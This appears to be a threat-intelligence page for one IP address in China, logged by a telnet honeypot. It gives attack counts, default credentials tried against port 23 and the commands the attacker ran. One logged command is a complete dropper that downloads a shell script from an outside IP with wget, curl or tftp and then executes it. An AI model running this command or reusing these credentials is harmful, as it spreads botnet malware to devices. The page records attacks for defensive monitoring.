Active Threat • LOW
58.242.53.145
Country of Origin🇨🇳 China
First Detection4/25/2026
Last Activity4/25/2026
ISPCHINA UNICOM China169 Backbone
🎯
90
Total Attacks
🔌
1
Ports
📡
1
Attack Types
🦠
1
Malware
Geolocation
- Country
- 🇨🇳 China
- City
- Unknown
- ASN
- AS4837
- ISP
- CHINA UNICOM China169 Backbone
Attack Types
ssh_telnet_honeypot
Attacked Ports
23
Associated Malware
Attempted Credentials
🔐root/root
6x🔐admin/admin
6x🔐root/(empty)
6xExecuted Commands
$
sh12x$
/bin/busybox sh6x$
cd /tmp || cd /run || cd /; wget -q http://176.65.139.143:8081/cdn/content/bins.sh -O .s || curl -s -o .s http://176.65.139.143:8081/cdn/content/bins.sh || tftp -g -l .s -r /cdn/content/bins.sh 176.65.139.143 69; chmod 777 .s; sh .s; rm -f .s6xShodan InternetDB ExposureShodan
InternetDB data, not real-time
Risk Assessment
35
/100
LowMediumHighCritical